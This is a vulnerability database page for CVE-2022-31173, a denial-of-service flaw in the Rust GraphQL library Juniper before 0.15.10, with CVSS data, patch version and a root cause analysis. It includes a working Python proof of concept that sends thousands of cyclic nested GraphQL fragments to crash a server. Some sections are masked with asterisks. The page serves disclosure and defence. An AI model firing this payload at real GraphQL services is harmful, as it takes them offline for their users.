7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2022-31173

GHSA ID

GHSA-4rx6-g5vg-5f3j

EPSS Score

0.30053%

CWE

CWE-400

Published

7/29/2022

Updated

7/24/2023

KEV Status

Technology

Rust

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2022-31173

CVE-2022-31173: Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow

GraphQL behaviour

Nested fragment in GraphQL might be quite hard to handle depending on the implementation language. Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.

# Infinite loop example
query {
    ...a
}

fragment a on Query {
    ...b
}

fragment b on Query {
    ...a
}

POC TLDR

With max_size being the number of nested fragment generated. At max_size=7500, it should instantly raise:

However, with a lower size, you will overflow the memory after some iterations.

Reproduction steps (Juniper)

git clone https://github.com/graphql-rust/juniper.git
cd juniper

Save this POC as poc.py

import requests
import time
import json
from itertools import permutations

print('=== Fragments POC ===')

url = 'http://localhost:8080/graphql'

max_size = 7500
perms = [''.join(p) for p in permutations('abcefghijk')]
perms = perms[:max_size]

fragment_payloads = ''
for i, perm in enumerate(perms):
    next_perm = perms[i+1] if i < max_size-1 else perms[0]
    fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}'

payload = {'query':'query{\n  ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None}

headers = {
  'Content-Type': 'application/json',
}

try:
    response = requests.request('POST', url, headers=headers, json=payload)
    print(response.text)
except requests.exceptions.ConnectionError:
    print('Connection closed, POC worked.')

cargo run
[in separate shell] python3 poc.py

Credits

@Escape-Technologies

@c3b5aw @MdotTIM @karimhreda

(GitHub Advisory)

7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2022-31173

GHSA ID

GHSA-4rx6-g5vg-5f3j

EPSS Score

0.30053%

CWE

CWE-400

Published

7/29/2022

Updated

7/24/2023

KEV Status

Technology

Rust

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
juniper	rust	< 0.15.10	0.15.10

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from recursive graph traversal implementations in validation rules that used stack-based recursion without depth limits. The commit diff shows replacements of recursive calls with heap-allocated stacks (Vec-based iteration), indicating the original functions were vulnerable to unbounded recursion. Key files modified include no_fragment_cycles.rs where the cycle detection was reimplemented to avoid recursion, and similar patterns in other validation rules. The POC demonstrates that ~7500 nested fragments cause crashes, matching typical stack size limitations in Rust.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### *r*p*QL ****viour N*st** *r**m*nt in *r*p*QL mi**t ** quit* **r* to **n*l* **p*n*in* on t** impl*m*nt*tion l*n*u***. Som* l*n*u*** support n*tiv*ly * m*x r**ursion **pt*. *ow*v*r, on most *ompil** l*n*u***s, you s*oul* *** * t*r*s*ol* o* r**ursi

Reasoning

T** vuln*r**ility st*ms *rom r**ursiv* *r*p* tr*v*rs*l impl*m*nt*tions in v*li**tion rul*s t**t us** st**k-**s** r**ursion wit*out **pt* limits. T** *ommit *i** s*ows r*pl***m*nts o* r**ursiv* **lls wit* ***p-*llo**t** st**ks (V**-**s** it*r*tion), i

7.5

Basic Information

Concerned about an active attack path?

CVE-2022-31173: Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow

GraphQL behaviour

POC TLDR

Reproduction steps (Juniper)

Credits

7.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI